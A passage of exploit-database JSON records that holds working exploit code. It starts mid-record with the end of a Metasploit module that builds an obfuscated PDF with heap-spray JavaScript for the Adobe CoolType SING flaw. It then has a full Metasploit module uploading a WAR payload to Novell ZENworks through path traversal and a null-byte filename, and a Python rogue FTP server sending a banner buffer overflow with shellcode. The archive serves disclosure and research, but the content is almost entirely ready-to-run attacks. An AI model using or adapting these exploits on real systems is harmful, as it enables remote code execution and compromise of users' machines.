''\n payload_buf << stack_data\n payload_buf << encoded_payload\n\n escaped_payload = Rex::Text.to_unescape(payload_buf)\n\n js = %Q|\nvar #{var_unescape} = unescape;\nvar #{var_shellcode} = #{var_unescape}( '#{escaped_payload}' );\nvar #{var_c} = #{var_unescape}( \"%\" + \"u\" + \"0\" + \"c\" + \"0\" + \"c\" + \"%u\" + \"0\" + \"c\" + \"0\" + \"c\" );\nwhile (#{var_c}.length + 20 + 8 < #{var_s}) #{var_c}+=#{var_c};\n#{var_b} = #{var_c}.substring(0, (0x0c0c-0x24)/2);\n#{var_b} += #{var_shellcode};\n#{var_b} += 
#{var_c};\n#{var_d} = #{var_b}.substring(0, #{var_s}/2);\nwhile(#{var_d}.length < 0x80000) #{var_d} += #{var_d};\n#{var_3} = #{var_d}.substring(0, 0x80000 - (0x1020-0x08) / 2);\nvar #{var_4} = new Array();\nfor (#{var_i}=0;#{var_i}<0x1f0;#{var_i}++) #{var_4}[#{var_i}]=#{var_3}+\"s\";\n|\n\n js\n end\n\n def random_non_ascii_string(count)\n result = \"\"\n count.times do\n result << (rand(128) + 128).chr\n end\n result\n end\n\n def io_def(id)\n \"%d 0 obj \\n\" % id\n end\n\n def io_ref(id)\n \"%d 0 R\" % id\n end\n\n\n #http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/\n def n_obfu(str)\n #return str\n result = \"\"\n str.scan(/./u) do |c|\n if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'\n result << \"#%x\" % c.unpack(\"C*\")[0]\n else\n result << c\n end\n end\n result\n end\n\n\n def ascii_hex_whitespace_encode(str)\n result = \"\"\n whitespace = \"\"\n str.each_byte do |b|\n result << whitespace << \"%02x\" % b\n whitespace = \" \" * (rand(3) + 1)\n end\n result << \">\"\n end\n\n\n def make_pdf(ttf, js)\n\n #swf_name = rand_text_alpha(8 + rand(8)) + \".swf\"\n\n xref = []\n eol = \"\\n\"\n endobj = \"endobj\" << eol\n\n # Randomize PDF version?\n pdf = \"%PDF-1.5\" << eol\n pdf << \"%\" << random_non_ascii_string(4) << eol\n\n # catalog\n xref << pdf.length\n pdf << io_def(1) << n_obfu(\"<<\") << eol\n pdf << n_obfu(\"/Pages \") << io_ref(2) << eol\n pdf << n_obfu(\"/Type /Catalog\") << eol\n pdf << n_obfu(\"/OpenAction \") << io_ref(11) << eol\n # The AcroForm is required to get icucnv36.dll to load\n pdf << n_obfu(\"/AcroForm \") << io_ref(13) << eol\n pdf << n_obfu(\">>\") << eol\n pdf << endobj\n\n # pages array\n xref << pdf.length\n pdf << io_def(2) << n_obfu(\"<<\") << eol\n pdf << n_obfu(\"/MediaBox \") << io_ref(3) << eol\n pdf << n_obfu(\"/Resources \") << io_ref(4) << eol\n pdf << n_obfu(\"/Kids [\") << io_ref(5) << \"]\" << eol\n pdf << n_obfu(\"/Count 1\") << eol\n pdf << n_obfu(\"/Type /Pages\") << eol\n pdf << 
n_obfu(\">>\") << eol\n pdf << endobj\n\n # media box\n xref << pdf.length\n pdf << io_def(3)\n pdf << \"[0 0 595 842]\" << eol\n pdf << endobj\n\n # resources\n xref << pdf.length\n pdf << io_def(4)\n pdf << n_obfu(\"<<\") << eol\n pdf << n_obfu(\"/Font \") << io_ref(6) << eol\n pdf << \">>\" << eol\n pdf << endobj\n\n # page 1\n xref << pdf.length\n pdf << io_def(5) << n_obfu(\"<<\") << eol\n pdf << n_obfu(\"/Parent \") << io_ref(2) << eol\n pdf << n_obfu(\"/MediaBox \") << io_ref(3) << eol\n pdf << n_obfu(\"/Resources \") << io_ref(4) << eol\n pdf << n_obfu(\"/Contents [\") << io_ref(8) << n_obfu(\"]\") << eol\n pdf << n_obfu(\"/Type /Page\") << eol\n pdf << n_obfu(\">>\") << eol # end obj dict\n pdf << endobj\n\n # font\n xref << pdf.length\n pdf << io_def(6) << n_obfu(\"<<\") << eol\n pdf << n_obfu(\"/F1 \") << io_ref(7) << eol\n pdf << \">>\" << eol\n pdf << endobj\n\n # ttf object\n xref << pdf.length\n pdf << io_def(7) << n_obfu(\"<<\") << eol\n pdf << n_obfu(\"/Type /Font\") << eol\n pdf << n_obfu(\"/Subtype /TrueType\") << eol\n pdf << n_obfu(\"/Name /F1\") << eol\n pdf << n_obfu(\"/BaseFont /Cinema\") << eol\n pdf << n_obfu(\"/Widths []\") << eol\n pdf << n_obfu(\"/FontDescriptor \") << io_ref(9)\n pdf << n_obfu(\"/Encoding /MacRomanEncoding\")\n pdf << n_obfu(\">>\") << eol\n pdf << endobj\n\n # page content\n content = \"Hello World!\"\n content = \"\" +\n \"0 g\" + eol +\n \"BT\" + eol +\n \"/F1 32 Tf\" + eol +\n \"32 Tc\" + eol +\n \"1 0 0 1 32 773.872 Tm\" + eol +\n \"(\" + content + \") Tj\" + eol +\n \"ET\"\n\n xref << pdf.length\n pdf << io_def(8) << \"<<\" << eol\n pdf << n_obfu(\"/Length %s\" % content.length) << eol\n pdf << \">>\" << eol\n pdf << \"stream\" << eol\n pdf << content << eol\n pdf << \"endstream\" << eol\n pdf << endobj\n\n # font descriptor\n xref << pdf.length\n pdf << io_def(9) << n_obfu(\"<<\")\n pdf << n_obfu(\"/Type/FontDescriptor/FontName/Cinema\")\n pdf << n_obfu(\"/Flags %d\" % (2**2 + 2**6 + 2**17))\n pdf << 
n_obfu(\"/FontBBox [-177 -269 1123 866]\")\n pdf << n_obfu(\"/FontFile2 \") << io_ref(10)\n pdf << n_obfu(\">>\") << eol\n pdf << endobj\n\n # ttf stream\n xref << pdf.length\n compressed = Zlib::Deflate.deflate(ttf)\n pdf << io_def(10) << n_obfu(\"<</Length %s/Filter/FlateDecode/Length1 %s>>\" % [compressed.length, ttf.length]) << eol\n pdf << \"stream\" << eol\n pdf << compressed << eol\n pdf << \"endstream\" << eol\n pdf << endobj\n\n # js action\n xref << pdf.length\n pdf << io_def(11) << n_obfu(\"<<\")\n pdf << n_obfu(\"/Type/Action/S/JavaScript/JS \") + io_ref(12)\n pdf << n_obfu(\">>\") << eol\n pdf << endobj\n\n # js stream\n xref << pdf.length\n compressed = Zlib::Deflate.deflate(ascii_hex_whitespace_encode(js))\n pdf << io_def(12) << n_obfu(\"<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>\" % compressed.length) << eol\n pdf << \"stream\" << eol\n pdf << compressed << eol\n pdf << \"endstream\" << eol\n pdf << endobj\n\n ###\n # The following form related data is required to get icucnv36.dll to load\n ###\n\n # form object\n xref << pdf.length\n pdf << io_def(13)\n pdf << n_obfu(\"<</XFA \") << io_ref(14) << n_obfu(\">>\") << eol\n pdf << endobj\n\n # form stream\n xfa = <<-EOF\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<xdp:xdp xmlns:xdp=\"http://ns.adobe.com/xdp/\">\n<config xmlns=\"http://www.xfa.org/schema/xci/2.6/\">\n<present><pdf><interactive>1</interactive></pdf></present>\n</config>\n<template xmlns=\"http://www.xfa.org/schema/xfa-template/2.6/\">\n<subform name=\"form1\" layout=\"tb\" locale=\"en_US\">\n<pageSet></pageSet>\n</subform></template></xdp:xdp>\nEOF\n\n xref << pdf.length\n pdf << io_def(14) << n_obfu(\"<</Length %s>>\" % xfa.length) << eol\n pdf << \"stream\" << eol\n pdf << xfa << eol\n pdf << \"endstream\" << eol\n pdf << endobj\n\n ###\n # end form stuff for icucnv36.dll\n ###\n\n\n # trailing stuff\n xrefPosition = pdf.length\n pdf << \"xref\" << eol\n pdf << \"0 %d\" % (xref.length + 1) << eol\n pdf << \"0000000000 65535 
f\" << eol\n xref.each do |index|\n pdf << \"%010d 00000 n\" % index << eol\n end\n\n pdf << \"trailer\" << eol\n pdf << n_obfu(\"<</Size %d/Root \" % (xref.length + 1)) << io_ref(1) << \">>\" << eol\n\n pdf << \"startxref\" << eol\n pdf << xrefPosition.to_s() << eol\n\n pdf << \"%%EOF\" << eol\n pdf\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/adobe_cooltype_sing.rb"}], "zdt": [{"lastseen": "2018-03-09T16:10:03", "bulletinFamily": "exploit", "description": "Exploit for java platform in category remote exploits", "modified": "2012-08-14T00:00:00", "published": "2012-08-14T00:00:00", "id": "1337DAY-ID-19184", "href": "https://0day.today/exploit/description/19184", "type": "zdt", "title": "Novell ZENworks Asset Management Remote Execution", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::EXE\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Novell ZENworks Asset Management Remote Execution',\r\n 'Description' => %q{\r\n This module exploits a path traversal flaw in Novell ZENworks Asset Management\r\n 7.5. 
By exploiting the CatchFileServlet, an attacker can upload a malicious file\r\n outside of the MalibuUploadDirectory and then make a secondary request that allows\r\n for arbitrary code execution.\r\n },\r\n 'Author' =>\r\n [\r\n 'Unknown', # Vulnerability discovery\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2011-2653' ],\r\n [ 'OSVDB', '77583' ],\r\n [ 'BID', '50966' ],\r\n [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-342/' ],\r\n [ 'URL', 'http://download.novell.com/Download?buildid=hPvHtXeNmCU~' ]\r\n ],\r\n 'Privileged' => true,\r\n 'Platform' => [ 'java' ],\r\n 'Targets' =>\r\n [\r\n [ 'Java Universal',\r\n {\r\n 'Arch' => ARCH_JAVA,\r\n 'Platform' => 'java'\r\n },\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Nov 02 2011'))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(8080),\r\n OptInt.new('DEPTH', [true, 'Traversal depth to reach the Tomcat webapps dir', 3])\r\n ], self.class )\r\n end\r\n\r\n def exploit\r\n\r\n # Generate the WAR containing the payload\r\n app_base = rand_text_alphanumeric(4+rand(32-4))\r\n jsp_name = rand_text_alphanumeric(8+rand(8))\r\n war_data = payload.encoded_war(:app_name => app_base, :jsp_name => jsp_name).to_s\r\n\r\n uid = rand_text_alphanumeric(34).to_s\r\n\r\n data = \"------#{uid}\\r\\n\"\r\n data << \"Content-Disposition: form-data; name=\\\"RequestParms\\\"\\r\\n\\r\\n\"\r\n data << \"\\r\\n\"\r\n data << \"------#{uid}\\r\\n\"\r\n data << \"Content-Disposition: form-data; name=\\\"language\\\"\\r\\n\\r\\n\"\r\n data << \"\\r\\n\"\r\n data << \"------#{uid}\\r\\n\"\r\n data << \"Content-Disposition: form-data; name=\\\"rtyp\\\"\\r\\n\\r\\n\"\r\n data << \"prod\\r\\n\"\r\n data << \"------#{uid}\\r\\n\"\r\n data << \"Content-Disposition: form-data; name=\\\"sess\\\"\\r\\n\\r\\n\"\r\n data << \"\\r\\n\"\r\n data << \"------#{uid}\\r\\n\"\r\n data << \"Content-Disposition: form-data; name=\\\"mode\\\"\\r\\n\\r\\n\"\r\n 
data << \"newreport\\r\\n\"\r\n data << \"------#{uid}\\r\\n\"\r\n data << \"Content-Disposition: form-data; name=\\\"dp\\\"\\r\\n\\r\\n\"\r\n data << \"n\\r\\n\"\r\n data << \"------#{uid}\\r\\n\"\r\n data << \"Content-Disposition: form-data; name=\\\"console\\\"\\r\\n\\r\\n\"\r\n data << \"\\r\\n\"\r\n data << \"------#{uid}\\r\\n\"\r\n data << \"Content-Disposition: form-data; name=\\\"oldentry\\\"\\r\\n\\r\\n\"\r\n data << \"\\r\\n\"\r\n data << \"------#{uid}\\r\\n\"\r\n data << \"Content-Disposition: form-data; name=\\\"act\\\"\\r\\n\\r\\n\"\r\n data << \"malibu.StartImportPAC\\r\\n\"\r\n data << \"------#{uid}\\r\\n\"\r\n data << \"Content-Disposition: form-data; name=\\\"saveact\\\"\\r\\n\\r\\n\"\r\n data << \"malibu.StartImportPAC\\r\\n\"\r\n data << \"------#{uid}\\r\\n\"\r\n data << \"Content-Disposition: form-data; name=\\\"isalert\\\"\\r\\n\\r\\n\"\r\n data << \"\\r\\n\"\r\n data << \"------#{uid}\\r\\n\"\r\n data << \"Content-Disposition: form-data; name=\\\"language\\\"\\r\\n\\r\\n\"\r\n data << \"\\r\\n\"\r\n data << \"------#{uid}\\r\\n\"\r\n data << \"Content-Disposition: form-data; name=\\\"queryid\\\"\\r\\n\\r\\n\"\r\n data << \"\\r\\n\"\r\n data << \"------#{uid}\\r\\n\"\r\n data << \"Content-Disposition: form-data; name=\\\"Locale\\\"\\r\\n\\r\\n\"\r\n data << \"MM/dd/yyyy\\r\\n\"\r\n data << \"------#{uid}\\r\\n\"\r\n data << \"Content-Disposition: form-data; name=\\\"CurrencySym\\\"\\r\\n\\r\\n\"\r\n data << \"$\\r\\n\"\r\n data << \"------#{uid}\\r\\n\"\r\n data << \"Content-Disposition: form-data; name=\\\"CurrencyPos\\\"\\r\\n\\r\\n\"\r\n data << \"start\\r\\n\"\r\n data << \"------#{uid}\\r\\n\"\r\n data << \"Content-Disposition: form-data; name=\\\"ThousandsSep\\\"\\r\\n\\r\\n\"\r\n data << \",\\r\\n\"\r\n data << \"------#{uid}\\r\\n\"\r\n data << \"Content-Disposition: form-data; name=\\\"CurDecimalPt\\\"\\r\\n\\r\\n\"\r\n data << \".\\r\\n\"\r\n data << \"------#{uid}\\r\\n\"\r\n data << \"Content-Disposition: form-data; 
name=\\\"MinusSign\\\"\\r\\n\\r\\n\"\r\n data << \"-\\r\\n\"\r\n data << \"------#{uid}\\r\\n\"\r\n data << \"Content-Disposition: form-data; name=\\\"sum\\\"\\r\\n\\r\\n\"\r\n data << \"\\r\\n\"\r\n data << \"------#{uid}\\r\\n\"\r\n data << \"Content-Disposition: form-data; name=\\\"grp\\\"\\r\\n\\r\\n\"\r\n data << \"\\r\\n\"\r\n data << \"------#{uid}\\r\\n\"\r\n data << \"Content-Disposition: form-data; name=\\\"col\\\"\\r\\n\\r\\n\"\r\n data << \"\\r\\n\"\r\n data << \"------#{uid}\\r\\n\"\r\n data << \"Content-Disposition: form-data; name=\\\"PreLoadRight\\\"\\r\\n\\r\\n\"\r\n data << \"yes\\r\\n\"\r\n data << \"------#{uid}\\r\\n\"\r\n data << \"Content-Disposition: form-data; name=\\\"console\\\"\\r\\n\\r\\n\"\r\n data << \"\\r\\n\"\r\n data << \"------#{uid}\\r\\n\"\r\n data << \"Content-Disposition: form-data; name=\\\"uploadFile\\\"; filename=\\\"/#{\"../\" * datastore['DEPTH']}#{app_base}.war\\x00.txt\\\"\\r\\n\"\r\n data << \"Content-Type: application/octet-stream\\r\\n\\r\\n\"\r\n data << war_data\r\n data << \"\\r\\n\"\r\n data << \"------#{uid}\\r\\n\"\r\n data << \"Content-Disposition: form-data; name=\\\"SuccessPage\\\"\\r\\n\\r\\n\"\r\n data << \"Html/UploadSuccess.html\\r\\n\"\r\n data << \"------#{uid}--\\r\\n\"\r\n\r\n res = send_request_cgi(\r\n {\r\n 'uri' => \"/rtrlet/catch\",\r\n 'method' => 'POST',\r\n 'ctype' => \"multipart/form-data; boundary=----#{uid}\",\r\n 'data' => data,\r\n })\r\n\r\n print_status(\"Uploading #{war_data.length} bytes as #{app_base}.war ...\")\r\n\r\n select(nil, nil, nil, 10)\r\n\r\n if (res.code == 500)\r\n print_status(\"Triggering payload at '/#{app_base}/#{jsp_name}.jsp' ...\")\r\n send_request_raw(\r\n {\r\n 'uri' => \"/#{app_base}/\" + \"#{jsp_name}\" + '.jsp',\r\n 'method' => 'GET',\r\n })\r\n else\r\n print_error(\"WAR upload failed...\")\r\n end\r\n\r\n end\r\n\r\nend\r\n\r\n\n\n# 0day.today [2018-03-09] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/19184"}, 
{"lastseen": "2018-03-19T01:59:57", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category remote exploits", "modified": "2009-05-05T00:00:00", "published": "2009-05-05T00:00:00", "id": "1337DAY-ID-9443", "href": "https://0day.today/exploit/description/9443", "type": "zdt", "title": "32bit FTP (09.04.24) (Banner) Remote Buffer Overflow Exploit", "sourceData": "============================================================\r\n32bit FTP (09.04.24) (Banner) Remote Buffer Overflow Exploit\r\n============================================================\r\n\r\n\r\n\r\n#!/usr/bin/python\r\n# _ _ _ __ _ _ _ \r\n#| || | (_) ___ / \\ | |__ | | | \r\n#| __ | | | (_-< | () | | / / |_ _|\r\n#|_||_| |_| /__/ \\__/ |_\\_\\ |_| \r\n#\r\n#[*] Bug : 32bit FTP (09.04.24) (Banner) Remote Buffer Overflow Exploit\r\n#[*] Founder : Load 99%\r\n#[*] Tested on : Xp sp3 (EN)(VB)\r\n#[*] Exploited by : His0k4\r\n#[*] Greetings : All friends & muslims HaCkErs (DZ),Algerians Elites,snakespc.com\r\n#[*] Serra7 Merra7 koulchi mderra7 :p\r\n\r\nfrom socket import *\r\n\r\npayload = \"\\x41\"*989\r\npayload += \"\\x67\\x86\\x86\\x7C\" # jmp esp kernerl32.dll\r\n\r\n # win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com\r\npayload += 
(\r\n\"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x4f\\x49\\x49\\x49\\x49\\x49\"\r\n\"\\x49\\x51\\x5a\\x56\\x54\\x58\\x36\\x33\\x30\\x56\\x58\\x34\\x41\\x30\\x42\\x36\"\r\n\"\\x48\\x48\\x30\\x42\\x33\\x30\\x42\\x43\\x56\\x58\\x32\\x42\\x44\\x42\\x48\\x34\"\r\n\"\\x41\\x32\\x41\\x44\\x30\\x41\\x44\\x54\\x42\\x44\\x51\\x42\\x30\\x41\\x44\\x41\"\r\n\"\\x56\\x58\\x34\\x5a\\x38\\x42\\x44\\x4a\\x4f\\x4d\\x4e\\x4f\\x4a\\x4e\\x46\\x44\"\r\n\"\\x42\\x50\\x42\\x30\\x42\\x50\\x4b\\x38\\x45\\x54\\x4e\\x53\\x4b\\x38\\x4e\\x47\"\r\n\"\\x45\\x30\\x4a\\x37\\x41\\x50\\x4f\\x4e\\x4b\\x58\\x4f\\x54\\x4a\\x31\\x4b\\x58\"\r\n\"\\x4f\\x45\\x42\\x32\\x41\\x30\\x4b\\x4e\\x49\\x54\\x4b\\x48\\x46\\x43\\x4b\\x38\"\r\n\"\\x41\\x30\\x50\\x4e\\x41\\x33\\x42\\x4c\\x49\\x49\\x4e\\x4a\\x46\\x48\\x42\\x4c\"\r\n\"\\x46\\x47\\x47\\x50\\x41\\x4c\\x4c\\x4c\\x4d\\x30\\x41\\x30\\x44\\x4c\\x4b\\x4e\"\r\n\"\\x46\\x4f\\x4b\\x33\\x46\\x35\\x46\\x42\\x46\\x30\\x45\\x37\\x45\\x4e\\x4b\\x58\"\r\n\"\\x4f\\x55\\x46\\x52\\x41\\x50\\x4b\\x4e\\x48\\x36\\x4b\\x48\\x4e\\x50\\x4b\\x54\"\r\n\"\\x4b\\x38\\x4f\\x35\\x4e\\x31\\x41\\x30\\x4b\\x4e\\x4b\\x38\\x4e\\x31\\x4b\\x58\"\r\n\"\\x41\\x50\\x4b\\x4e\\x49\\x38\\x4e\\x35\\x46\\x52\\x46\\x30\\x43\\x4c\\x41\\x43\"\r\n\"\\x42\\x4c\\x46\\x46\\x4b\\x48\\x42\\x34\\x42\\x43\\x45\\x48\\x42\\x4c\\x4a\\x47\"\r\n\"\\x4e\\x50\\x4b\\x48\\x42\\x34\\x4e\\x30\\x4b\\x48\\x42\\x47\\x4e\\x51\\x4d\\x4a\"\r\n\"\\x4b\\x38\\x4a\\x46\\x4a\\x30\\x4b\\x4e\\x49\\x30\\x4b\\x58\\x42\\x38\\x42\\x4b\"\r\n\"\\x42\\x30\\x42\\x30\\x42\\x30\\x4b\\x48\\x4a\\x36\\x4e\\x53\\x4f\\x55\\x41\\x43\"\r\n\"\\x48\\x4f\\x42\\x46\\x48\\x55\\x49\\x58\\x4a\\x4f\\x43\\x58\\x42\\x4c\\x4b\\x37\"\r\n\"\\x42\\x35\\x4a\\x46\\x42\\x4f\\x4c\\x48\\x46\\x50\\x4f\\x45\\x4a\\x46\\x4a\\x59\"\r\n\"\\x50\\x4f\\x4c\\x58\\x50\\x50\\x47\\x35\\x4f\\x4f\\x47\\x4e\\x43\\x56\\x41\\x56\"\r\n\"\\x4e\\x56\\x43\\x36\\x42\\x30\\x5a\")\r\n\r\ns = socket(AF_INET, SOCK_STREAM)\r\ns.bind((\"0.0.0.0\", 21))\r\ns.listen(1)\r\nprint \"[+] 
Listening on [FTP] 21\"\r\nc, addr = s.accept()\r\n\r\nprint \"[+] Connection accepted from: %s\" % (addr[0])\r\n\r\nc.send(\"220 \"+payload+\"\\r\\n\")\r\nc.recv(1024)\r\nc.close()\r\nraw_input(\"[+] Done, press enter to quit\")\r\ns.close()\r\n\r\n\r\n\n# 0day.today [2018-03-19] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/9443"}]}